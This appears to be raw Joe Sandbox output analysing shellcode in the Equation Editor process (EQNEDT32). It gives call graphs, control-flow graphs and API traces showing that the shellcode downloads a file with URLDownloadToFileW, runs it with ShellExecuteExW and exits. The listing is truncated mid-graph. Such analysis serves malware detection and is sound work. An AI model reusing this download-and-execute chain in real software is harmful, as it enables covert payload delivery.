                    callgraph 0 Function_03570356 2 Function_03570390 0->2 4 Function_0357051B 0->4 6 Function_035703C5 0->6 7 Function_03570504 0->7 13 Function_0357044F 0->13 27 Function_035704BA 0->27 28 Function_03570539 0->28 35 Function_03570420 0->35 1 Function_03570215 1->2 1->4 1->6 1->7 1->13 1->27 1->28 1->35 2->4 2->6 2->7 2->13 2->27 2->28 2->35 42 Function_035703A9 2->42 3 Function_0357001F 18 Function_035702F6 3->18 4->28 5 Function_0357029A 5->2 5->4 5->6 5->7 5->13 5->27 5->28 5->35 6->4 6->7 6->13 6->27 6->28 29 Function_035705B9 6->29 6->35 37 Function_035703EC 6->37 7->4 7->28 8 Function_03570282 8->2 8->4 8->6 8->7 8->13 8->27 8->28 8->35 9 Function_03570540 43 Function_03570568 9->43 10 Function_035702C0 10->2 10->4 10->6 10->7 10->13 10->27 10->28 10->35 11 Function_03570000 12 Function_03570300 12->2 12->4 12->6 12->7 12->13 12->27 12->28 12->35 13->4 13->7 13->27 13->28 14 Function_035702CA 14->2 14->4 14->6 14->7 14->13 14->27 14->28 14->35 15 Function_03570288 15->2 15->4 15->6 15->7 15->13 15->27 15->28 15->35 16 Function_035701F7 16->2 16->4 16->6 16->7 16->13 16->27 16->28 16->35 17 Function_03570237 17->18 18->2 18->4 18->6 18->7 18->13 18->27 18->28 18->35 19 Function_03570435 19->4 19->7 19->13 19->27 19->28 20 Function_035700F4 21 Function_03570274 21->2 21->4 21->6 21->7 21->13 21->27 21->28 21->35 22 Function_03570073 23 Function_03570272 23->2 23->4 23->6 23->7 23->13 23->27 23->28 23->35 24 Function_035701F1 24->2 24->4 24->6 24->7 24->13 24->27 24->28 24->35 25 Function_03570230 25->2 25->4 25->6 25->7 25->13 25->27 25->28 25->35 26 Function_0357007F 26->18 27->4 27->7 27->28 30 Function_035702B8 30->2 30->4 30->6 30->7 30->13 30->27 30->28 30->35 31 Function_03570067 31->18 32 Function_03570263 32->2 32->4 32->6 32->7 32->13 32->27 32->28 32->35 33 Function_035702E3 33->2 33->4 33->6 33->7 33->13 33->27 33->28 33->35 34 Function_03570321 34->2 34->4 34->6 34->7 34->13 34->27 34->28 34->35 35->19 36 Function_035701EC 36->2 36->4 36->6 36->7 36->13 36->27 36->28 36->35 37->35 38 Function_0357022C 38->18 39 Function_0357026B 39->2 39->4 39->6 39->7 39->13 39->27 39->28 39->35 40 Function_035702AB 40->2 40->4 40->6 40->7 40->13 40->27 40->28 40->35 41 Function_0357022A 41->18 42->4 42->6 42->7 42->13 42->27 42->28 42->29 42->35 44 Function_03570168

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 3570435-3570441 LoadLibraryW call 357044f 4 3570443-35704ad call 35704ba 0->4 5 35704b1-3570511 URLDownloadToFileW call 3570504 call 357051b 0->5 4->5 19 3570513-3570518 5->19 20 3570578-357057c 5->20 21 3570571 19->21 22 357051a-3570526 ShellExecuteExW 19->22 23 35705a7-35705b0 20->23 24 357057e 20->24 25 3570574-3570577 21->25 27 357052d-357052e 22->27 28 3570528 call 3570539 22->28 23->25 26 3570582 24->26 31 35705b2 25->31 32 3570579-357057c 25->32 33 3570584-3570588 26->33 34 357058a-357058e 26->34 29 3570530 27->29 30 3570599-357059d 27->30 28->27 29->26 35 3570532 29->35 40 35705a1 30->40 41 357059f 30->41 36 35705b5-35705b6 31->36 32->23 32->24 33->34 37 3570596 33->37 38 35705a3-35705a5 34->38 39 3570590-3570594 34->39 35->38 42 3570534-357053e ExitProcess 35->42 37->30 38->36 39->37 39->38 40->23 40->38 41->38
                    APIs
                    • LoadLibraryW.KERNEL32(03570427), ref: 03570435
                      • Part of subcall function 0357044F: URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
                      • Part of subcall function 0357044F: ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                      • Part of subcall function 0357044F: ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                    • String ID: <
                    • API String ID: 2508257586-4251816714
                    • Opcode ID: 03f0432b5a11b669deac01b082bc69d90379ed3555d8832cb03f9ed9560cd063
                    • Instruction ID: 151643cae512d2d2afddf649385455d42017b39da4f8458ec7c610f963d8cdef
                    • Opcode Fuzzy Hash: 03f0432b5a11b669deac01b082bc69d90379ed3555d8832cb03f9ed9560cd063
                    • Instruction Fuzzy Hash: 0B316BE680C3C12FD7239730AC69666BFA5AB57214F5989CED4C24A0F3E6688501C756
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 45 35703a9 46 35703af 45->46 47 35703aa call 35705b9 45->47 48 35703b6-35703b7 46->48 49 35703b1 call 35703c5 46->49 47->46 50 357040a-3570429 48->50 51 35703ba 48->51 49->48 54 357042b-3570433 50->54 53 35703bc-35703bf 51->53 51->54 55 3570427-3570428 53->55 56 35703c2 53->56 55->54 57 3570437-3570441 call 357044f 56->57 58 35703c4-35703d3 56->58 65 3570443-3570444 57->65 66 35704b1-3570511 URLDownloadToFileW call 3570504 call 357051b 57->66 60 3570445-357044a 58->60 61 35703d5-35703da 58->61 63 357044d-3570456 60->63 61->60 64 35703dc 61->64 67 3570458-35704ad call 35704ba 63->67 64->63 68 35703de-35703e2 64->68 65->60 84 3570513-3570518 66->84 85 3570578-357057c 66->85 67->66 68->57 71 35703e4 68->71 71->67 72 35703e6-3570407 call 3570420 71->72 72->50 86 3570571 84->86 87 357051a-3570526 ShellExecuteExW 84->87 88 35705a7-35705b0 85->88 89 357057e 85->89 90 3570574-3570577 86->90 92 357052d-357052e 87->92 93 3570528 call 3570539 87->93 88->90 91 3570582 89->91 96 35705b2 90->96 97 3570579-357057c 90->97 98 3570584-3570588 91->98 99 357058a-357058e 91->99 94 3570530 92->94 95 3570599-357059d 92->95 93->92 94->91 100 3570532 94->100 105 35705a1 95->105 106 357059f 95->106 101 35705b5-35705b6 96->101 97->88 97->89 98->99 102 3570596 98->102 103 35705a3-35705a5 99->103 104 3570590-3570594 99->104 100->103 107 3570534-357053e ExitProcess 100->107 102->95 103->101 104->102 104->103 105->88 105->103 106->103
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
                    • ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                    • ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID: <
                    • API String ID: 3584569557-4251816714
                    • Opcode ID: 24dbe183f2a2fd50b3f359701c40bba18532e36b12245b5d96bd6921655c4bbd
                    • Instruction ID: c0b9017e5df352b2dba4295650580992198e86905bc766d581b5e97a8a2dcbba
                    • Opcode Fuzzy Hash: 24dbe183f2a2fd50b3f359701c40bba18532e36b12245b5d96bd6921655c4bbd
                    • Instruction Fuzzy Hash: DC51BCA680D3C16FD722D730BC69665BFA2BB53200F5D8ACED4C64B0F3E6688505C756
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 110 35703c5-35703d3 call 35705b9 call 35703ec 115 3570445-357044a 110->115 116 35703d5-35703da 110->116 117 357044d-3570456 115->117 116->115 118 35703dc 116->118 119 3570458-35704ad call 35704ba 117->119 118->117 120 35703de-35703e2 118->120 132 35704b1-3570511 URLDownloadToFileW call 3570504 call 357051b 119->132 122 3570437-3570441 call 357044f 120->122 123 35703e4 120->123 131 3570443-3570444 122->131 122->132 123->119 124 35703e6-3570433 call 3570420 123->124 131->115 144 3570513-3570518 132->144 145 3570578-357057c 132->145 146 3570571 144->146 147 357051a-3570526 ShellExecuteExW 144->147 148 35705a7-35705b0 145->148 149 357057e 145->149 150 3570574-3570577 146->150 152 357052d-357052e 147->152 153 3570528 call 3570539 147->153 148->150 151 3570582 149->151 156 35705b2 150->156 157 3570579-357057c 150->157 158 3570584-3570588 151->158 159 357058a-357058e 151->159 154 3570530 152->154 155 3570599-357059d 152->155 153->152 154->151 160 3570532 154->160 165 35705a1 155->165 166 357059f 155->166 161 35705b5-35705b6 156->161 157->148 157->149 158->159 162 3570596 158->162 163 35705a3-35705a5 159->163 164 3570590-3570594 159->164 160->163 167 3570534-357053e ExitProcess 160->167 162->155 163->161 164->162 164->163 165->148 165->163 166->163
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
                    • ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                    • ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID: <
                    • API String ID: 3584569557-4251816714
                    • Opcode ID: c0582df5a932d594d70b2a51f27198aacfab6a3758f994f9b2ddf6cd703361f6
                    • Instruction ID: 58a9f7820f0207521991134d86c0af598e3b4d2757b6c32b6a773668cf92d909
                    • Opcode Fuzzy Hash: c0582df5a932d594d70b2a51f27198aacfab6a3758f994f9b2ddf6cd703361f6
                    • Instruction Fuzzy Hash: B841AAA680D3C16FD723EB30BC6965ABFA1BF53100F498ACE94C64B0F3E6689505C756
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 170 357044f-357045a 172 3570460-3570511 URLDownloadToFileW call 3570504 call 357051b 170->172 173 357045b call 35704ba 170->173 183 3570513-3570518 172->183 184 3570578-357057c 172->184 173->172 185 3570571 183->185 186 357051a-3570526 ShellExecuteExW 183->186 187 35705a7-35705b0 184->187 188 357057e 184->188 189 3570574-3570577 185->189 191 357052d-357052e 186->191 192 3570528 call 3570539 186->192 187->189 190 3570582 188->190 195 35705b2 189->195 196 3570579-357057c 189->196 197 3570584-3570588 190->197 198 357058a-357058e 190->198 193 3570530 191->193 194 3570599-357059d 191->194 192->191 193->190 199 3570532 193->199 204 35705a1 194->204 205 357059f 194->205 200 35705b5-35705b6 195->200 196->187 196->188 197->198 201 3570596 197->201 202 35705a3-35705a5 198->202 203 3570590-3570594 198->203 199->202 206 3570534-357053e ExitProcess 199->206 201->194 202->200 203->201 203->202 204->187 204->202 205->202
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID: <
                    • API String ID: 3584569557-4251816714
                    • Opcode ID: d063475578b2e5cb5f42e1ce578550a3b89ec736e0c9c7a6e5d45bb2f6deec2c
                    • Instruction ID: c7d4d88df139a83ea3ce2c29563ffab5a565517600e8f6157bfde55a6c441c19
                    • Opcode Fuzzy Hash: d063475578b2e5cb5f42e1ce578550a3b89ec736e0c9c7a6e5d45bb2f6deec2c
                    • Instruction Fuzzy Hash: F4314BE680C3C16FDB239B30AC69666BFE16F57214F5989CED4C64B4F3E6688401C712
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 209 35704ba-35704ed URLDownloadToFileW 210 35704f4-3570511 call 357051b 209->210 211 35704ef call 3570504 209->211 215 3570513-3570518 210->215 216 3570578-357057c 210->216 211->210 217 3570571 215->217 218 357051a-3570526 ShellExecuteExW 215->218 219 35705a7-35705b0 216->219 220 357057e 216->220 221 3570574-3570577 217->221 223 357052d-357052e 218->223 224 3570528 call 3570539 218->224 219->221 222 3570582 220->222 227 35705b2 221->227 228 3570579-357057c 221->228 229 3570584-3570588 222->229 230 357058a-357058e 222->230 225 3570530 223->225 226 3570599-357059d 223->226 224->223 225->222 231 3570532 225->231 236 35705a1 226->236 237 357059f 226->237 232 35705b5-35705b6 227->232 228->219 228->220 229->230 233 3570596 229->233 234 35705a3-35705a5 230->234 235 3570590-3570594 230->235 231->234 238 3570534-357053e ExitProcess 231->238 233->226 234->232 235->233 235->234 236->219 236->234 237->234
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
                      • Part of subcall function 03570504: ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                      • Part of subcall function 03570504: ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID: <
                    • API String ID: 3584569557-4251816714
                    • Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                    • Instruction ID: 6b414c82decac0ea31f50790ad1efbdeafb70bfc77d262678a9fb39662d02cbc
                    • Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                    • Instruction Fuzzy Hash: 4F0126E980C3806EE761EB34F88876ABAE4BFC4280F040859A446871F2EE74C904D605
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 241 3570504-3570506 243 357050b-3570511 241->243 244 3570506 call 357051b 241->244 245 3570513-3570518 243->245 246 3570578-357057c 243->246 244->243 247 3570571 245->247 248 357051a-3570526 ShellExecuteExW 245->248 249 35705a7-35705b0 246->249 250 357057e 246->250 251 3570574-3570577 247->251 253 357052d-357052e 248->253 254 3570528 call 3570539 248->254 249->251 252 3570582 250->252 257 35705b2 251->257 258 3570579-357057c 251->258 259 3570584-3570588 252->259 260 357058a-357058e 252->260 255 3570530 253->255 256 3570599-357059d 253->256 254->253 255->252 261 3570532 255->261 266 35705a1 256->266 267 357059f 256->267 262 35705b5-35705b6 257->262 258->249 258->250 259->260 263 3570596 259->263 264 35705a3-35705a5 260->264 265 3570590-3570594 260->265 261->264 268 3570534-357053e ExitProcess 261->268 263->256 264->262 265->263 265->264 266->249 266->264 267->264
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                    • Instruction ID: 677e21c3d0826206622b880754c5480c4e744c87a89895fbcccc53fe8123b03e
                    • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                    • Instruction Fuzzy Hash: 9E01A2D880834668DF71F728F4882B9EED0FF822C4B9C8856A8D2470F5D9149583861D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 271 357051b-357052e ShellExecuteExW call 3570539 275 3570530 271->275 276 3570599-357059d 271->276 277 3570582 275->277 278 3570532 275->278 279 35705a1 276->279 280 357059f 276->280 284 3570584-3570588 277->284 285 357058a-357058e 277->285 281 35705a3-35705a5 278->281 282 3570534-357053e ExitProcess 278->282 279->281 283 35705a7-35705b0 279->283 280->281 286 35705b5-35705b6 281->286 291 35705b2 283->291 292 3570579-357057c 283->292 284->285 289 3570596 284->289 285->281 290 3570590-3570594 285->290 289->276 290->281 290->289 291->286 292->283 294 357057e 292->294 294->277
                    APIs
                    • ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                      • Part of subcall function 03570539: ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                    • Instruction ID: e47724598d3a48aaf9a4f9ddead151772435365a08fd565c062311a709ae5ff2
                    • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                    • Instruction Fuzzy Hash: E2F0FFC980426211DF30F668F8583BAAFD4FF922D0F8C8843A8C2070F5D96892C38A19
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 295 3570539-357053e ExitProcess
                    APIs
                    • ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                    • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                    • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 297 3570540-357054b GetPEB 298 357054e-357055f call 3570568 297->298 301 3570561-3570565 298->301
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                    • Instruction ID: 4634eb66db5eaf4010e2bb0e8e77a610ef1ff3a33ef1398718d04785778674ef
                    • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                    • Instruction Fuzzy Hash: 95D052B1202502CFC344DF04E980E62F3BAFFC8661B28C268E0044B669C330E892CA90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 302 3570390-35703af ExitProcess call 35703a9 305 35703b6-35703b7 302->305 306 35703b1 call 35703c5 302->306 307 357040a-3570429 305->307 308 35703ba 305->308 306->305 311 357042b-3570433 307->311 310 35703bc-35703bf 308->310 308->311 312 3570427-3570428 310->312 313 35703c2 310->313 312->311 314 3570437-3570441 call 357044f 313->314 315 35703c4-35703d3 313->315 322 3570443-3570444 314->322 323 35704b1-3570511 URLDownloadToFileW call 3570504 call 357051b 314->323 317 3570445-357044a 315->317 318 35703d5-35703da 315->318 320 357044d-3570456 317->320 318->317 321 35703dc 318->321 324 3570458-35704ad call 35704ba 320->324 321->320 325 35703de-35703e2 321->325 322->317 341 3570513-3570518 323->341 342 3570578-357057c 323->342 324->323 325->314 328 35703e4 325->328 328->324 329 35703e6-3570407 call 3570420 328->329 329->307 343 3570571 341->343 344 357051a-3570526 ShellExecuteExW 341->344 345 35705a7-35705b0 342->345 346 357057e 342->346 347 3570574-3570577 343->347 349 357052d-357052e 344->349 350 3570528 call 3570539 344->350 345->347 348 3570582 346->348 353 35705b2 347->353 354 3570579-357057c 347->354 355 3570584-3570588 348->355 356 357058a-357058e 348->356 351 3570530 349->351 352 3570599-357059d 349->352 350->349 351->348 357 3570532 351->357 362 35705a1 352->362 363 357059f 352->363 358 35705b5-35705b6 353->358 354->345 354->346 355->356 359 3570596 355->359 360 35705a3-35705a5 356->360 361 3570590-3570594 356->361 357->360 364 3570534-357053e ExitProcess 357->364 359->352 360->358 361->359 361->360 362->345 362->360 363->360
                    APIs
                    • ExitProcess.KERNEL32(0357037E), ref: 03570390
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 92e99969890bcb78d68b0f15f2aeb8007205d658bbf80d9a294b31fbf41807e7
                    • Instruction ID: df57c4bd598dbcc13cb50121db5ab24ad8be2d97a7f1b6fd62e4d147a772025a
                    • Opcode Fuzzy Hash: 92e99969890bcb78d68b0f15f2aeb8007205d658bbf80d9a294b31fbf41807e7
                    • Instruction Fuzzy Hash: A711BB5580E7C15FC712EB707E6A059FFB2B913100B5C86CB80C58B1F3E218964AD392
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:17.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:16%
                    Total number of Nodes:1586
                    Total number of Limit Nodes:31
                    execution_graph 4056 401941 4057 401943 4056->4057 4062 402da6 4057->4062 4063 402db2 4062->4063 4108 406557 4063->4108 4066 401948 4068 405c26 4066->4068 4150 405ef1 4068->4150 4071 405c65 4074 405d90 4071->4074 4164 40651a lstrcpynW 4071->4164 4072 405c4e DeleteFileW 4073 401951 4072->4073 4074->4073 4193 406850 FindFirstFileW 4074->4193 4076 405c8b 4077 405c91 lstrcatW 4076->4077 4078 405c9e 4076->4078 4079 405ca4 4077->4079 4165 405e35 lstrlenW 4078->4165 4083 405cb4 lstrcatW 4079->4083 4084 405caa 4079->4084 4086 405cbf lstrlenW FindFirstFileW 4083->4086 4084->4083 4084->4086 4085 405dae 4196 405de9 lstrlenW CharPrevW 4085->4196 4089 405d85 4086->4089 4106 405ce1 4086->4106 4089->4074 4090 405d68 FindNextFileW 4094 405d7e FindClose 4090->4094 4090->4106 4091 405bde 5 API calls 4093 405dc0 4091->4093 4095 405dc4 4093->4095 4096 405dda 4093->4096 4094->4089 4095->4073 4099 40557c 24 API calls 4095->4099 4098 40557c 24 API calls 4096->4098 4098->4073 4101 405dd1 4099->4101 4100 405c26 60 API calls 4100->4106 4103 4062da 36 API calls 4101->4103 4102 40557c 24 API calls 4102->4090 4105 405dd8 4103->4105 4105->4073 4106->4090 4106->4100 4106->4102 4169 40651a lstrcpynW 4106->4169 4170 405bde 4106->4170 4178 40557c 4106->4178 4189 4062da MoveFileExW 4106->4189 4109 406564 4108->4109 4110 406787 4109->4110 4113 406755 lstrlenW 4109->4113 4117 406557 10 API calls 4109->4117 4118 40666c GetSystemDirectoryW 4109->4118 4119 40667f GetWindowsDirectoryW 4109->4119 4120 4066ae SHGetSpecialFolderLocation 4109->4120 4121 4066f6 lstrcatW 4109->4121 4122 406557 10 API calls 4109->4122 4123 4067a1 5 API calls 4109->4123 4134 4063e8 4109->4134 4139 406461 wsprintfW 4109->4139 4140 40651a lstrcpynW 4109->4140 4111 402dd3 4110->4111 4141 40651a lstrcpynW 4110->4141 4111->4066 4125 4067a1 4111->4125 4113->4109 4117->4113 4118->4109 4119->4109 4120->4109 4124 4066c6 SHGetPathFromIDListW CoTaskMemFree 4120->4124 4121->4109 4122->4109 4123->4109 4124->4109 4131 4067ae 4125->4131 4126 406824 4127 406829 CharPrevW 4126->4127 4129 40684a 4126->4129 4127->4126 4128 406817 CharNextW 4128->4126 4128->4131 4129->4066 4131->4126 4131->4128 4132 406803 CharNextW 4131->4132 4133 406812 CharNextW 4131->4133 4146 405e16 4131->4146 4132->4131 4133->4128 4142 406387 4134->4142 4137 40644c 4137->4109 4138 40641c RegQueryValueExW RegCloseKey 4138->4137 4139->4109 4140->4109 4141->4111 4143 406396 4142->4143 4144 40639a 4143->4144 4145 40639f RegOpenKeyExW 4143->4145 4144->4137 4144->4138 4145->4144 4147 405e1c 4146->4147 4148 405e32 4147->4148 4149 405e23 CharNextW 4147->4149 4148->4131 4149->4147 4199 40651a lstrcpynW 4150->4199 4152 405f02 4200 405e94 CharNextW CharNextW 4152->4200 4155 405c46 4155->4071 4155->4072 4156 4067a1 5 API calls 4162 405f18 4156->4162 4157 405f49 lstrlenW 4158 405f54 4157->4158 4157->4162 4160 405de9 3 API calls 4158->4160 4159 406850 2 API calls 4159->4162 4161 405f59 GetFileAttributesW 4160->4161 4161->4155 4162->4155 4162->4157 4162->4159 4163 405e35 2 API calls 4162->4163 4163->4157 4164->4076 4166 405e43 4165->4166 4167 405e55 4166->4167 4168 405e49 CharPrevW 4166->4168 4167->4079 4168->4166 4168->4167 4169->4106 4206 405fe5 GetFileAttributesW 4170->4206 4173 405c0b 4173->4106 4174 405c01 DeleteFileW 4176 405c07 4174->4176 4175 405bf9 RemoveDirectoryW 4175->4176 4176->4173 4177 405c17 SetFileAttributesW 4176->4177 4177->4173 4179 405597 4178->4179 4180 405639 4178->4180 4181 4055b3 lstrlenW 4179->4181 4182 406557 17 API calls 4179->4182 4180->4106 4183 4055c1 lstrlenW 4181->4183 4184 4055dc 4181->4184 4182->4181 4183->4180 4185 4055d3 lstrcatW 4183->4185 4186 4055e2 SetWindowTextW 4184->4186 4187 4055ef 4184->4187 4185->4184 4186->4187 4187->4180 4188 4055f5 SendMessageW SendMessageW SendMessageW 4187->4188 4188->4180 4190 4062fb 4189->4190 4191 4062ee 4189->4191 4190->4106 4209 406160 4191->4209 4194 405daa 4193->4194 4195 406866 FindClose 4193->4195 4194->4073 4194->4085 4195->4194 4197 405db4 4196->4197 4198 405e05 lstrcatW 4196->4198 4197->4091 4198->4197 4199->4152 4201 405eb1 4200->4201 4202 405ec3 4200->4202 4201->4202 4203 405ebe CharNextW 4201->4203 4204 405e16 CharNextW 4202->4204 4205 405ee7 4202->4205 4203->4205 4204->4202 4205->4155 4205->4156 4207 405bea 4206->4207 4208 405ff7 SetFileAttributesW 4206->4208 4207->4173 4207->4174 4207->4175 4208->4207 4210 406190 4209->4210 4211 4061b6 GetShortPathNameW 4209->4211 4236 40600a GetFileAttributesW CreateFileW 4210->4236 4213 4062d5 4211->4213 4214 4061cb 4211->4214 4213->4190 4214->4213 4216 4061d3 wsprintfA 4214->4216 4215 40619a CloseHandle GetShortPathNameW 4215->4213 4217 4061ae 4215->4217 4218 406557 17 API calls 4216->4218 4217->4211 4217->4213 4219 4061fb 4218->4219 4237 40600a GetFileAttributesW CreateFileW 4219->4237 4221 406208 4221->4213 4222 406217 GetFileSize GlobalAlloc 4221->4222 4223 406239 4222->4223 4224 4062ce CloseHandle 4222->4224 4238 40608d ReadFile 4223->4238 4224->4213 4229 406258 lstrcpyA 4232 40627a 4229->4232 4230 40626c 4231 405f6f 4 API calls 4230->4231 4231->4232 4233 4062b1 SetFilePointer 4232->4233 4245 4060bc WriteFile 4233->4245 4236->4215 4237->4221 4239 4060ab 4238->4239 4239->4224 4240 405f6f lstrlenA 4239->4240 4241 405fb0 lstrlenA 4240->4241 4242 405fb8 4241->4242 4243 405f89 lstrcmpiA 4241->4243 4242->4229 4242->4230 4243->4242 4244 405fa7 CharNextA 4243->4244 4244->4241 4246 4060da GlobalFree 4245->4246 4246->4224 4247 4015c1 4248 402da6 17 API calls 4247->4248 4249 4015c8 4248->4249 4250 405e94 4 API calls 4249->4250 4262 4015d1 4250->4262 4251 401631 4253 401663 4251->4253 4254 401636 4251->4254 4252 405e16 CharNextW 4252->4262 4256 401423 24 API calls 4253->4256 4274 401423 4254->4274 4263 40165b 4256->4263 4261 40164a SetCurrentDirectoryW 4261->4263 4262->4251 4262->4252 4264 401617 GetFileAttributesW 4262->4264 4266 405ae5 4262->4266 4269 405a4b CreateDirectoryW 4262->4269 4278 405ac8 CreateDirectoryW 4262->4278 4264->4262 4281 4068e7 GetModuleHandleA 4266->4281 4270 405a98 4269->4270 4271 405a9c GetLastError 4269->4271 4270->4262 4271->4270 4272 405aab SetFileSecurityW 4271->4272 4272->4270 4273 405ac1 GetLastError 4272->4273 4273->4270 4275 40557c 24 API calls 4274->4275 4276 401431 4275->4276 4277 40651a lstrcpynW 4276->4277 4277->4261 4279 405ad8 4278->4279 4280 405adc GetLastError 4278->4280 4279->4262 4280->4279 4282 406903 4281->4282 4283 40690d GetProcAddress 4281->4283 4287 406877 GetSystemDirectoryW 4282->4287 4285 405aec 4283->4285 4285->4262 4286 406909 4286->4283 4286->4285 4288 406899 wsprintfW LoadLibraryExW 4287->4288 4288->4286 5005 401c43 5006 402d84 17 API calls 5005->5006 5007 401c4a 5006->5007 5008 402d84 17 API calls 5007->5008 5009 401c57 5008->5009 5010 401c6c 5009->5010 5011 402da6 17 API calls 5009->5011 5012 402da6 17 API calls 5010->5012 5016 